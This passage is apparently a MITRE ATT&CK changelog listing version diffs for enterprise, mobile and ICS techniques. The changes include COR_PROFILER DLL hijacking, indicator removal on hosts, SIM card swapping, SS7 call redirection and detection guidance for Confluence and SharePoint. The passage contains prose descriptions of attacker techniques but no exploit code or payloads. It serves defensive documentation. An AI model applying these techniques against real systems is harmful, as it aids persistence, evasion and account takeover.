2017)Adversaries may leverage the COR_PROFILER environment variable to hijack the execution flow of programs that load the .NET CLR. The COR_PROFILER is a .NET Framework feature which allows developers to specify an unmanaged (or external of .NET) profiling DLL to be loaded into each .NET process that loads the Common Language Runtime (CLR). These profilers are designed to monitor, troubleshoot, and debug managed code executed by the .NET CLR.(Citation: Microsoft Profiling Mar 2017)(Citation: Microsoft COR_PROFILER Feb 2013) The COR_PROFILER environment variable can be set at various scopes (system, user, or process) resulting in different levels of influence. System and user-wide environment variable scopes are specified in the Registry, where a [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM) object can be registered as a profiler DLL. A process scope COR_PROFILER can also be created in-memory without modifying the Registry. Starting with .NET Framework 4, the profiling DLL does not need to be registered as long as the location of the DLL is specified in the COR_PROFILER_PATH environment variable.(Citation: Microsoft COR_PROFILER Feb 2013) Adversaries may abuse COR_PROFILER to establish persistence that executes a malicious DLL in the context of all .NET processes every time the CLR is invoked. The COR_PROFILER can also be used to elevate privileges (ex: [Bypass User Account Control](https://attack.mitre.org/techniques/T1548/002)) if the victim .NET process executes at a higher permission level, as well as to hook and [Impair Defenses](https://attack.mitre.org/techniques/T1562) provided by .NET processes.(Citation: RedCanary Mockingbird May 2020)(Citation: Red Canary COR_PROFILER May 2020)(Citation: Almond COR_PROFILER Apr 2019)(Citation: GitHub OmerYa Invisi-Shell)(Citation: subTee .NET Profilers May 2017)

[T1554] Compromise Client Software Binary

Current version: 1.0

New Detections:

Details
values_changed
STIX FieldOld valueNew Value
modified2020-03-27 14:49:58.249000+00:002021-10-19 03:18:43.648000+00:00

[T1213.001] Data from Information Repositories: Confluence

Current version: 1.0

New Detections:

Details
values_changed
STIX FieldOld valueNew Value
modified2020-03-24 16:42:09.222000+00:002021-06-08 17:08:08.386000+00:00
x_mitre_detectionMonitor access to Confluence repositories performed by privileged users (for example, Active Directory Domain, Enterprise, or Schema Administrators) as these types of accounts should not generally used to access information repositories. If the capability exists, it may be of value to monitor and alert on users that are retrieving and viewing a large number of documents and pages; this behavior may be indicative of programmatic means being used to retrieve all data within the repository. In environments with high-maturity, it may be possible to leverage User-Behavioral Analytics (UBA) platforms to detect and alert on user based anomalies. User access logging within Atlassian's Confluence can be configured to report access to certain pages and documents through AccessLogFilter. (Citation: Atlassian Confluence Logging) Additional log storage and analysis infrastructure will likely be required for more robust detection capabilities.Monitor access to Confluence repositories performed by privileged users (for example, Active Directory Domain, Enterprise, or Schema Administrators) as these types of accounts should generally not be used to access information repositories. If the capability exists, it may be of value to monitor and alert on users that are retrieving and viewing a large number of documents and pages; this behavior may be indicative of programmatic means being used to retrieve all data within the repository. In environments with high-maturity, it may be possible to leverage User-Behavioral Analytics (UBA) platforms to detect and alert on user based anomalies. User access logging within Atlassian's Confluence can be configured to report access to certain pages and documents through AccessLogFilter. (Citation: Atlassian Confluence Logging) Additional log storage and analysis infrastructure will likely be required for more robust detection capabilities.

[T1136] Create Account

Current version: 2.2

New Detections:

Details
values_changed
STIX FieldOld valueNew Value
modified2021-03-16 12:47:00.458000+00:002021-08-12 13:04:14.534000+00:00

[T1543] Create or Modify System Process

Current version: 1.0

New Detections:

Details
values_changed
STIX FieldOld valueNew Value
modified2020-10-09 13:46:29.922000+00:002021-10-15 07:41:41.496000+00:00

[T1555] Credentials from Password Stores

Current version: 1.0

New Detections:

Details
values_changed
STIX FieldOld valueNew Value
modified2021-04-29 21:00:19.428000+00:002021-06-21 17:58:03.788000+00:00

[T1087.002] Account Discovery: Domain Account

Current version: 1.0

New Detections:

Details
values_changed
STIX FieldOld valueNew Value
modified2020-03-26 13:42:34.402000+00:002021-10-13 14:05:14.784000+00:00
x_mitre_detectionSystem and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained. Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001). System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained. Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).

[T1480.001] Execution Guardrails: Environmental Keying

Current version: 1.0

New Detections:

Details
values_changed
STIX FieldOld valueNew Value
modified2021-03-29 19:56:42.242000+00:002021-06-09 18:53:58.159000+00:00
x_mitre_contributors[0]Nick Carr, FireEyeNick Carr, Mandiant

[T1546] Event Triggered Execution

Current version: 1.1

New Detections:

Details
values_changed
STIX FieldOld valueNew Value
modified2021-04-13 21:32:54.610000+00:002021-10-16 20:11:14.193000+00:00

[T1480] Execution Guardrails

Current version: 1.1

New Detections:

Details
values_changed
STIX FieldOld valueNew Value
modified2020-06-24 18:52:12.956000+00:002021-06-09 18:53:58.471000+00:00
x_mitre_contributors[0]Nick Carr, FireEyeNick Carr, Mandiant

[T1190] Exploit Public-Facing Application

Current version: 2.3

New Detections:

Details
values_changed
STIX FieldOld valueNew Value
modified2021-04-12 18:25:16.409000+00:002021-07-20 21:51:45.776000+00:00

[T1083] File and Directory Discovery

Current version: 1.3


Old Description
New Description
t1Adversaries may enumerate files and directories or may searct1Adversaries may enumerate files and directories or may searc
>h in specific locations of a host or network share for certa>h in specific locations of a host or network share for certa
>in information within a file system. Adversaries may use the>in information within a file system. Adversaries may use the
> information from [File and Directory Discovery](https://att> information from [File and Directory Discovery](https://att
>ack.mitre.org/techniques/T1083) during automated discovery t>ack.mitre.org/techniques/T1083) during automated discovery t
>o shape follow-on behaviors, including whether or not the ad>o shape follow-on behaviors, including whether or not the ad
>versary fully infects the target and/or attempts specific ac>versary fully infects the target and/or attempts specific ac
>tions.  Many command shell utilities can be used to obtain t>tions.  Many command shell utilities can be used to obtain t
>his information. Examples include <code>dir</code>, <code>tr>his information. Examples include <code>dir</code>, <code>tr
>ee</code>, <code>ls</code>, <code>find</code>, and <code>loc>ee</code>, <code>ls</code>, <code>find</code>, and <code>loc
>ate</code>. (Citation: Windows Commands JPCERT) Custom tools>ate</code>.(Citation: Windows Commands JPCERT) Custom tools 
> may also be used to gather file and directory information a>may also be used to gather file and directory information an
>nd interact with the [Native API](https://attack.mitre.org/t>d interact with the [Native API](https://attack.mitre.org/te
>echniques/T1106).>chniques/T1106).

New Detections:

Details
values_changed
STIX FieldOld valueNew Value
modified2020-09-16 16:02:16.770000+00:002021-08-23 20:44:32.048000+00:00
descriptionAdversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from [File and Directory Discovery](https://attack.mitre.org/techniques/T1083) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions. Many command shell utilities can be used to obtain this information. Examples include dir, tree, ls, find, and locate. (Citation: Windows Commands JPCERT) Custom tools may also be used to gather file and directory information and interact with the [Native API](https://attack.mitre.org/techniques/T1106).Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from [File and Directory Discovery](https://attack.mitre.org/techniques/T1083) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions. Many command shell utilities can be used to obtain this information. Examples include dir, tree, ls, find, and locate.(Citation: Windows Commands JPCERT) Custom tools may also be used to gather file and directory information and interact with the [Native API](https://attack.mitre.org/techniques/T1106).
external_references[3]['url']http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.htmlhttps://blogs.jpcert.or.jp/en/2016/01/windows-commands-abused-by-attackers.html

[T1222] File and Directory Permissions Modification

Current version: 2.1

New Detections:

Details
values_changed
STIX FieldOld valueNew Value
modified2020-09-01 20:05:05.562000+00:002021-09-13 21:08:10.406000+00:00

[T1574] Hijack Execution Flow

Current version: 1.1

New Detections:

Details
values_changed
STIX FieldOld valueNew Value
modified2021-04-27 19:55:20.290000+00:002021-10-14 23:52:52.536000+00:00

[T1070] Indicator Removal on Host

Current version: 1.2


Old Description
New Description
t1Adversaries may delete or alter generated artifacts on a host1Adversaries may delete or alter generated artifacts on a hos
>t system, including logs or captured files such as quarantin>t system, including logs or captured files such as quarantin
>ed malware. Locations and format of logs are platform or pro>ed malware. Locations and format of logs are platform or pro
>duct-specific, however standard operating system logs are ca>duct-specific, however standard operating system logs are ca
>ptured as Windows events or Linux/macOS files such as [Bash >ptured as Windows events or Linux/macOS files such as [Bash 
>History](https://attack.mitre.org/techniques/T1552/003) and >History](https://attack.mitre.org/techniques/T1552/003) and 
>/var/log/*.  These actions may interfere with event collecti>/var/log/*.  These actions may interfere with event collecti
>on, reporting, or other notifications used to detect intrusi>on, reporting, or other notifications used to detect intrusi
>on activity. This that may compromise the integrity of secur>on activity. This may compromise the integrity of security s
>ity solutions by causing notable events to go unreported. Th>olutions by causing notable events to go unreported. This ac
>is activity may also impede forensic analysis and incident r>tivity may also impede forensic analysis and incident respon
>esponse, due to lack of sufficient data to determine what oc>se, due to lack of sufficient data to determine what occurre
>curred.>d.

New Detections:

Details
values_changed
STIX FieldOld valueNew Value
modified2021-04-24 13:35:09.065000+00:002021-07-27 15:23:52.099000+00:00
descriptionAdversaries may delete or alter generated artifacts on a host system, including logs or captured files such as quarantined malware. Locations and format of logs are platform or product-specific, however standard operating system logs are captured as Windows events or Linux/macOS files such as [Bash History](https://attack.mitre.org/techniques/T1552/003) and /var/log/*. These actions may interfere with event collection, reporting, or other notifications used to detect intrusion activity. This that may compromise the integrity of security solutions by causing notable events to go unreported. This activity may also impede forensic analysis and incident response, due to lack of sufficient data to determine what occurred.Adversaries may delete or alter generated artifacts on a host system, including logs or captured files such as quarantined malware. Locations and format of logs are platform or product-specific, however standard operating system logs are captured as Windows events or Linux/macOS files such as [Bash History](https://attack.mitre.org/techniques/T1552/003) and /var/log/*. These actions may interfere with event collection, reporting, or other notifications used to detect intrusion activity. This may compromise the integrity of security solutions by causing notable events to go unreported. This activity may also impede forensic analysis and incident response, due to lack of sufficient data to determine what occurred.

[T1056] Input Capture

Current version: 1.2

New Detections:

Details
values_changed
STIX FieldOld valueNew Value
modified2020-10-21 01:31:35.760000+00:002021-08-24 18:21:08.497000+00:00

[T1036] Masquerading

Current version: 1.4

New Detections:

Details
values_changed
STIX FieldOld valueNew Value
modified2021-04-24 13:24:45.840000+00:002021-10-18 13:24:52.973000+00:00
x_mitre_contributors[1]Nick Carr, FireEyeNick Carr, Mandiant

[T1556] Modify Authentication Process

Current version: 2.0

New Detections:

Details
values_changed
STIX FieldOld valueNew Value
modified2021-04-26 20:08:31.712000+00:002021-10-17 14:48:33.990000+00:00

[T1218.007] Signed Binary Proxy Execution: Msiexec

Current version: 1.1

New Detections:

Details
values_changed
STIX FieldOld valueNew Value
modified2020-12-14 18:40:45.170000+00:002021-06-07 19:57:26.824000+00:00
iterable_item_added
STIX FieldOld valueNew Value
x_mitre_contributorsZiv Kaspersky, Cymptom

[T1550.002] Use Alternate Authentication Material: Pass the Hash

Current version: 1.1

New Detections:

Details
values_changed
STIX FieldOld valueNew Value
modified2021-03-15 21:04:33.228000+00:002021-08-31 19:55:02.702000+00:00

[T1550.003] Use Alternate Authentication Material: Pass the Ticket

Current version: 1.1

New Detections:

Details
values_changed
STIX FieldOld valueNew Value
modified2021-03-15 21:42:11.839000+00:002021-08-31 19:56:31.341000+00:00

[T1555.005] Credentials from Password Stores: Password Managers

Current version: 1.0

New Detections:

Details
values_changed
STIX FieldOld valueNew Value
modified2021-04-14 19:15:22.416000+00:002021-06-21 17:58:03.269000+00:00

[T1556.003] Modify Authentication Process: Pluggable Authentication Modules

Current version: 2.0

New Detections:

Details
values_changed
STIX FieldOld valueNew Value
modified2021-04-20 20:12:34.422000+00:002021-10-17 14:48:33.580000+00:00

[T1090] Proxy

Current version: 3.1

New Detections:

Details
values_changed
STIX FieldOld valueNew Value
modified2020-10-21 17:54:28.531000+00:002021-08-30 19:16:11.648000+00:00
x_mitre_contributors[0]Brian PrangeJon Sheedy

[T1059.006] Command and Scripting Interpreter: Python

Current version: 1.0

New Detections:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_remote_supportFalse
values_changed
STIX FieldOld valueNew Value
modified2020-06-23 19:03:15.180000+00:002021-07-26 22:49:23.094000+00:00

[T1053] Scheduled Task/Job

Current version: 2.1

New Detections:

Details
values_changed
STIX FieldOld valueNew Value
modified2021-04-20 16:31:11.405000+00:002021-10-15 14:36:26.445000+00:00

[T1213.002] Data from Information Repositories: Sharepoint

Current version: 1.0

New Detections:

Details
values_changed
STIX FieldOld valueNew Value
modified2020-03-24 16:41:00.821000+00:002021-06-08 17:10:31.187000+00:00
x_mitre_detectionThe user access logging within Microsoft's SharePoint can be configured to report access to certain pages and documents. (Citation: Microsoft SharePoint Logging). As information repositories generally have a considerably large user base, detection of malicious use can be non-trivial. At minimum, access to information repositories performed by privileged users (for example, Active Directory Domain, Enterprise, or Schema Administrators) should be closely monitored and alerted upon, as these types of accounts should not generally used to access information repositories. If the capability exists, it may be of value to monitor and alert on users that are retrieving and viewing a large number of documents and pages; this behavior may be indicative of programmatic means being used to retrieve all data within the repository. In environments with high-maturity, it may be possible to leverage User-Behavioral Analytics (UBA) platforms to detect and alert on user based anomalies. The user access logging within Microsoft's SharePoint can be configured to report access to certain pages and documents. (Citation: Microsoft SharePoint Logging). As information repositories generally have a considerably large user base, detection of malicious use can be non-trivial. At minimum, access to information repositories performed by privileged users (for example, Active Directory Domain, Enterprise, or Schema Administrators) should be closely monitored and alerted upon, as these types of accounts should generally not be used to access information repositories. If the capability exists, it may be of value to monitor and alert on users that are retrieving and viewing a large number of documents and pages; this behavior may be indicative of programmatic means being used to retrieve all data within the repository. In environments with high-maturity, it may be possible to leverage User-Behavioral Analytics (UBA) platforms to detect and alert on user based anomalies.

[T1218] Signed Binary Proxy Execution

Current version: 2.1

New Detections:

Details
values_changed
STIX FieldOld valueNew Value
modified2021-01-20 18:12:12.134000+00:002021-10-16 00:13:19.412000+00:00

[T1216] Signed Script Proxy Execution

Current version: 1.1

New Detections:

Details
values_changed
STIX FieldOld valueNew Value
modified2020-06-20 22:39:47.559000+00:002021-09-01 00:57:01.576000+00:00

[T1614] System Location Discovery

Current version: 1.0

New Detections:

Details
values_changed
STIX FieldOld valueNew Value
modified2021-04-20 19:25:49.977000+00:002021-10-15 22:00:56.438000+00:00

[T1505.002] Server Software Component: Transport Agent

Current version: 1.0

New Detections:

Details
values_changed
STIX FieldOld valueNew Value
modified2020-03-25 22:59:59.124000+00:002021-10-18 17:05:44.321000+00:00
x_mitre_contributors[1] Christoffer StrömbladChristoffer Strömblad

[T1127] Trusted Developer Utilities Proxy Execution

Current version: 1.2

New Detections:

Details
values_changed
STIX FieldOld valueNew Value
modified2021-03-05 22:25:49.118000+00:002021-10-15 23:57:08.312000+00:00
Deprecations

[T1053.004] Scheduled Task/Job: Launchd

Current version: 1.0

Description: This technique is deprecated due to the inaccurate usage. The report cited did not provide technical detail as to how the malware interacted directly with launchd rather than going through known services. Other system services are used to interact with launchd rather than launchd being used by itself. Adversaries may abuse the Launchd daemon to perform task scheduling for initial or recurring execution of malicious code. The launchd daemon, native to macOS, is responsible for loading and maintaining services within the operating system. This process loads the parameters for each launch-on-demand system-level daemon from the property list (plist) files found in /System/Library/LaunchDaemons and /Library/LaunchDaemons (Citation: AppleDocs Launch Agent Daemons). These LaunchDaemons have property list files which point to the executables that will be launched (Citation: Methods of Mac Malware Persistence). An adversary may use the launchd daemon in macOS environments to schedule new executables to run at system startup or on a scheduled basis for persistence. launchd can also be abused to run a process under the context of a specified account. Daemons, such as launchd, run with the permissions of the root user account, and will operate regardless of which user account is logged in.

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedTrue
values_changed
STIX FieldOld valueNew Value
modified2020-03-23 22:41:14.739000+00:002021-10-07 21:38:03.610000+00:00
descriptionAdversaries may abuse the Launchd daemon to perform task scheduling for initial or recurring execution of malicious code. The launchd daemon, native to macOS, is responsible for loading and maintaining services within the operating system. This process loads the parameters for each launch-on-demand system-level daemon from the property list (plist) files found in /System/Library/LaunchDaemons and /Library/LaunchDaemons (Citation: AppleDocs Launch Agent Daemons). These LaunchDaemons have property list files which point to the executables that will be launched (Citation: Methods of Mac Malware Persistence). An adversary may use the launchd daemon in macOS environments to schedule new executables to run at system startup or on a scheduled basis for persistence. launchd can also be abused to run a process under the context of a specified account. Daemons, such as launchd, run with the permissions of the root user account, and will operate regardless of which user account is logged in.This technique is deprecated due to the inaccurate usage. The report cited did not provide technical detail as to how the malware interacted directly with launchd rather than going through known services. Other system services are used to interact with launchd rather than launchd being used by itself. Adversaries may abuse the Launchd daemon to perform task scheduling for initial or recurring execution of malicious code. The launchd daemon, native to macOS, is responsible for loading and maintaining services within the operating system. This process loads the parameters for each launch-on-demand system-level daemon from the property list (plist) files found in /System/Library/LaunchDaemons and /Library/LaunchDaemons (Citation: AppleDocs Launch Agent Daemons). These LaunchDaemons have property list files which point to the executables that will be launched (Citation: Methods of Mac Malware Persistence). An adversary may use the launchd daemon in macOS environments to schedule new executables to run at system startup or on a scheduled basis for persistence. launchd can also be abused to run a process under the context of a specified account. Daemons, such as launchd, run with the permissions of the root user account, and will operate regardless of which user account is logged in.

mobile-attack

New Techniques

[T1616] Call Control

Current version: 1.0

Description: Adversaries may make, forward, or block phone calls without user authorization. This could be used for adversary goals such as audio surveillance, blocking or forwarding calls from the device owner, or C2 communication. Several permissions may be used to programmatically control phone calls, including: * `ANSWER_PHONE_CALLS` - Allows the application to answer incoming phone calls(Citation: Android Permissions) * `CALL_PHONE` - Allows the application to initiate a phone call without going through the Dialer interface(Citation: Android Permissions) * `PROCESS_OUTGOING_CALLS` - Allows the application to see the number being dialed during an outgoing call with the option to redirect the call to a different number or abort the call altogether(Citation: Android Permissions) * `MANAGE_OWN_CALLS` - Allows a calling application which manages its own calls through the self-managed `ConnectionService` APIs(Citation: Android Permissions) * `BIND_TELECOM_CONNECTION_SERVICE` - Required permission when using a `ConnectionService`(Citation: Android Permissions) * `WRITE_CALL_LOG` - Allows an application to write to the device call log, potentially to hide malicious phone calls(Citation: Android Permissions) When granted some of these permissions, an application can make a phone call without opening the dialer first. However, if an application desires to simply redirect the user to the dialer with a phone number filled in, it can launch an Intent using `Intent.ACTION_DIAL`, which requires no specific permissions. This then requires the user to explicitly initiate the call or use some form of [Input Injection](https://attack.mitre.org/techniques/T1516) to programmatically initiate it.


[T1617] Hooking

Current version: 1.0

Description: Adversaries may utilize hooking to hide the presence of artifacts associated with their behaviors to evade detection. Hooking can be used to modify return values or data structures of system APIs and function calls. This process typically involves using 3rd party root frameworks, such as Xposed or Magisk, with either a system exploit or pre-existing root access. By including custom modules for root frameworks, adversaries can hook system APIs and alter the return value and/or system data structures to alter functionality/visibility of various aspects of the system.


[T1618] User Evasion

Current version: 1.0

Description: Adversaries may attempt to avoid detection by hiding malicious behavior from the user. By doing this, an adversary’s modifications would most likely remain installed on the device for longer, allowing the adversary to continue to operate on that device. While there are many ways this can be accomplished, one method is by using the device’s sensors. By utilizing the various motion sensors on a device, such as accelerometer or gyroscope, an application could detect that the device is being interacted with. That way, the application could continue to run while the device is not in use but cease operating while the user is using the device, hiding anything that would indicate malicious activity was ongoing. Accessing the sensors in this way does not require any permissions from the user, so it would be completely transparent.

Minor Version Changes

[T1449] Exploit SS7 to Redirect Phone Calls/SMS

Current version: 1.2

Version changed from: 1.1 → 1.2


Old Description
New Description
t1An adversary could exploit signaling system vulnerabilities t1An adversary could exploit signaling system vulnerabilities 
>to redirect calls or text messages (SMS) to a phone number u>to redirect calls or text messages (SMS) to a phone number u
>nder the attacker's control. The adversary could then act as>nder the attacker's control. The adversary could then act as
> a man-in-the-middle to intercept or manipulate the communic> an adversary-in-the-middle to intercept or manipulate the c
>ation. (Citation: Engel-SS7) (Citation: Engel-SS7-2008) (Cit>ommunication. (Citation: Engel-SS7) (Citation: Engel-SS7-200
>ation: 3GPP-Security) (Citation: Positive-SS7) (Citation: CS>8) (Citation: 3GPP-Security) (Citation: Positive-SS7) (Citat
>RIC5-WG10-FinalReport) Interception of SMS messages could en>ion: CSRIC5-WG10-FinalReport) Interception of SMS messages c
>able adversaries to obtain authentication codes used for mul>ould enable adversaries to obtain authentication codes used 
>ti-factor authentication(Citation: TheRegister-SS7).>for multi-factor authentication(Citation: TheRegister-SS7).
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_is_subtechniqueFalse
values_changed
STIX FieldOld valueNew Value
modified2019-02-03 16:28:52.821000+00:002021-07-28 18:43:50.490000+00:00
descriptionAn adversary could exploit signaling system vulnerabilities to redirect calls or text messages (SMS) to a phone number under the attacker's control. The adversary could then act as a man-in-the-middle to intercept or manipulate the communication. (Citation: Engel-SS7) (Citation: Engel-SS7-2008) (Citation: 3GPP-Security) (Citation: Positive-SS7) (Citation: CSRIC5-WG10-FinalReport) Interception of SMS messages could enable adversaries to obtain authentication codes used for multi-factor authentication(Citation: TheRegister-SS7).An adversary could exploit signaling system vulnerabilities to redirect calls or text messages (SMS) to a phone number under the attacker's control. The adversary could then act as an adversary-in-the-middle to intercept or manipulate the communication. (Citation: Engel-SS7) (Citation: Engel-SS7-2008) (Citation: 3GPP-Security) (Citation: Positive-SS7) (Citation: CSRIC5-WG10-FinalReport) Interception of SMS messages could enable adversaries to obtain authentication codes used for multi-factor authentication(Citation: TheRegister-SS7).
x_mitre_version1.11.2

[T1463] Manipulate Device Communication

Current version: 1.1

Version changed from: 1.0 → 1.1


Old Description
New Description
t1If network traffic between the mobile device and a remote set1If network traffic between the mobile device and a remote se
>rver is not securely protected, then an attacker positioned >rver is not securely protected, then an attacker positioned 
>on the network may be able to manipulate network communicati>on the network may be able to manipulate network communicati
>on without being detected. For example, FireEye researchers >on without being detected. For example, FireEye researchers 
>found in 2014 that 68% of the top 1,000 free applications in>found in 2014 that 68% of the top 1,000 free applications in
> the Google Play Store had at least one Transport Layer Secu> the Google Play Store had at least one Transport Layer Secu
>rity (TLS) implementation vulnerability potentially opening >rity (TLS) implementation vulnerability potentially opening 
>the applications' network traffic to man-in-the-middle attac>the applications' network traffic to adversary-in-the-middle
>ks (Citation: FireEye-SSL).> attacks (Citation: FireEye-SSL).
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_is_subtechniqueFalse
values_changed
STIX FieldOld valueNew Value
modified2018-10-17 00:14:20.652000+00:002021-07-28 18:45:08.382000+00:00
descriptionIf network traffic between the mobile device and a remote server is not securely protected, then an attacker positioned on the network may be able to manipulate network communication without being detected. For example, FireEye researchers found in 2014 that 68% of the top 1,000 free applications in the Google Play Store had at least one Transport Layer Security (TLS) implementation vulnerability potentially opening the applications' network traffic to man-in-the-middle attacks (Citation: FireEye-SSL).If network traffic between the mobile device and a remote server is not securely protected, then an attacker positioned on the network may be able to manipulate network communication without being detected. For example, FireEye researchers found in 2014 that 68% of the top 1,000 free applications in the Google Play Store had at least one Transport Layer Security (TLS) implementation vulnerability potentially opening the applications' network traffic to adversary-in-the-middle attacks (Citation: FireEye-SSL).
x_mitre_version1.01.1

[T1451] SIM Card Swap

Current version: 1.2

Version changed from: 1.1 → 1.2


Old Description
New Description
t1An adversary could convince the mobile network operator (e.gt1An adversary could convince the mobile network operator (e.g
>. through social networking, forged identification, or insid>. through social networking, forged identification, or insid
>er attacks performed by trusted employees) to issue a new SI>er attacks performed by trusted employees) to issue a new SI
>M card and associate it with an existing phone number and ac>M card and associate it with an existing phone number and ac
>count (Citation: NYGov-Simswap) (Citation: Motherboard-Simsw>count.(Citation: NYGov-Simswap)(Citation: Motherboard-Simswa
>ap2). The adversary could then obtain SMS messages or hijack>p2) The adversary could then obtain SMS messages or hijack p
> phone calls intended for someone else (Citation: Betanews-S>hone calls intended for someone else.(Citation: Betanews-Sim
>imswap).   One use case is intercepting authentication messa>swap)  One use case is intercepting authentication messages 
>ges or phone calls to obtain illicit access to online bankin>or phone calls to obtain illicit access to online banking or
>g or other online accounts, as many online services allow ac> other online accounts, as many online services allow accoun
>count password resets by sending an authentication code over>t password resets by sending an authentication code over SMS
> SMS to a phone number associated with the account (Citation> to a phone number associated with the account.(Citation: Gu
>: Guardian-Simswap) (Citation: Motherboard-Simswap1)(Citatio>ardian-Simswap)(Citation: Motherboard-Simswap1)(Citation: Kr
>n: Krebs-SimSwap)(Citation: TechCrunch-SimSwap).>ebs-SimSwap)(Citation: TechCrunch-SimSwap)

New Mitigations:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_contributors['Karim Hasanen, @_karimhasanen']
x_mitre_is_subtechniqueFalse
values_changed
STIX FieldOld valueNew Value
modified2019-02-03 14:13:24.168000+00:002021-09-30 18:45:26.323000+00:00
descriptionAn adversary could convince the mobile network operator (e.g. through social networking, forged identification, or insider attacks performed by trusted employees) to issue a new SIM card and associate it with an existing phone number and account (Citation: NYGov-Simswap) (Citation: Motherboard-Simswap2). The adversary could then obtain SMS messages or hijack phone calls intended for someone else (Citation: Betanews-Simswap). One use case is intercepting authentication messages or phone calls to obtain illicit access to online banking or other online accounts, as many online services allow account password resets by sending an authentication code over SMS to a phone number associated with the account (Citation: Guardian-Simswap) (Citation: Motherboard-Simswap1)(Citation: Krebs-SimSwap)(Citation: TechCrunch-SimSwap).An adversary could convince the mobile network operator (e.g. through social networking, forged identification, or insider attacks performed by trusted employees) to issue a new SIM card and associate it with an existing phone number and account.(Citation: NYGov-Simswap)(Citation: Motherboard-Simswap2) The adversary could then obtain SMS messages or hijack phone calls intended for someone else.(Citation: Betanews-Simswap) One use case is intercepting authentication messages or phone calls to obtain illicit access to online banking or other online accounts, as many online services allow account password resets by sending an authentication code over SMS to a phone number associated with the account.(Citation: Guardian-Simswap)(Citation: Motherboard-Simswap1)(Citation: Krebs-SimSwap)(Citation: TechCrunch-SimSwap)
x_mitre_version1.11.2

ics-attack

New Techniques

[T0864] Transient Cyber Asset

Current version: 0.0

Description: Adversaries may target devices that are transient across ICS networks and external networks. Normally, transient assets are brought into an environment by authorized personnel and do not remain in that environment on a permanent basis. (Citation: NERC June 2021) Transient assets are commonly needed to support management functions and may be more common in systems where a remotely managed asset is not feasible, external connections for remote access do not exist, or 3rd party contractor/vendor access is required. Adversaries may take advantage of transient assets in different ways. For instance, adversaries may target a transient asset when it is connected to an external network and then leverage its trusted access in another environment to launch an attack. They may also take advantage of installed applications and libraries that are used by legitimate end-users to interact with control system devices. Transient assets, in some cases, may not be deployed with a secure configuration leading to weaknesses that could allow an adversary to propagate malicious executable code, e.g., the transient asset may be infected by malware and when connected to an ICS environment the malware propagates onto other systems. In the Maroochy attack, the adversary utilized a computer, possibly stolen, with proprietary engineering software to communicate with a wastewater system. (Citation: Maroochy - MITRE - 200808)

Patches

[T0800] Activate Firmware Update Mode

Current version: 0.0

Details
values_changed
STIX FieldOld valueNew Value
modified2021-04-13 12:02:26.506000+00:002021-10-08 15:14:01.612000+00:00
x_mitre_data_sources[0]Application logsNetwork Traffic: Network Traffic Content
x_mitre_data_sources[1]Sequential event recorderApplication Log: Application Log Content
x_mitre_data_sources[2]Network protocol analysisOperational Databases: Device Alarm
iterable_item_removed
STIX FieldOld valueNew Value
x_mitre_data_sourcesPacket capture

[T0878] Alarm Suppression

Current version: 0.0

Details
values_changed
STIX FieldOld valueNew Value
modified2020-05-21 17:43:26.506000+00:002021-10-08 13:04:01.612000+00:00
x_mitre_data_sources[0]Alarm historyNetwork Traffic: Network Traffic Content
x_mitre_data_sources[1]Alarm thresholdsApplication Log: Application Log Content
x_mitre_data_sources[2]Network protocol analysisOperational Databases: Process History/Live Data
x_mitre_data_sources[3]Packet captureOperational Databases: Process/Event Alarm
iterable_item_added
STIX FieldOld valueNew Value
x_mitre_platformsDevice Configuration/Parameters

[T0802] Automated Collection

Current version: 0.0

Details
values_changed
STIX FieldOld valueNew Value
modified2020-05-21 17:43:26.506000+00:002021-10-08 13:04:01.612000+00:00
x_mitre_data_sources[0]File monitoringCommand: Command Execution
x_mitre_data_sources[1]Data loss preventionFile: File Access
x_mitre_data_sources[2]Process command-line parametersScript: Script Execution
iterable_item_added
STIX FieldOld valueNew Value
x_mitre_data_sourcesNetwork Traffic: Network Traffic Content

[T0803] Block Command Message

Current version: 0.0

Details
values_changed
STIX FieldOld valueNew Value
modified2020-05-21 17:43:26.506000+00:002021-10-08 13:04:01.612000+00:00
x_mitre_data_sources[0]Alarm HistoryNetwork Traffic: Network Traffic Flow
x_mitre_data_sources[1]Network protocol analysisNetwork Traffic: Network Connection Creation
x_mitre_data_sources[2]Packet captureApplication Log: Application Log Content
iterable_item_added
STIX FieldOld valueNew Value
x_mitre_data_sourcesProcess: Process Termination
x_mitre_data_sourcesOperational Databases: Process History/Live Data
x_mitre_data_sourcesOperational Databases: Process/Event Alarm
x_mitre_platformsDevice Configuration/Parameters

[T0804] Block Reporting Message

Current version: 0.0

Details
values_changed
STIX FieldOld valueNew Value
modified2020-05-21 17:43:26.506000+00:002021-10-08 13:04:01.612000+00:00
x_mitre_data_sources[0]Alarm HistoryNetwork Traffic: Network Traffic Flow
x_mitre_data_sources[1]Data historianNetwork Traffic: Network Connection Creation
x_mitre_data_sources[2]Network protocol analysisApplication Log: Application Log Content
x_mitre_data_sources[3]Packet captureProcess: Process Termination
iterable_item_added
STIX FieldOld valueNew Value
x_mitre_data_sourcesOperational Databases: Process History/Live Data
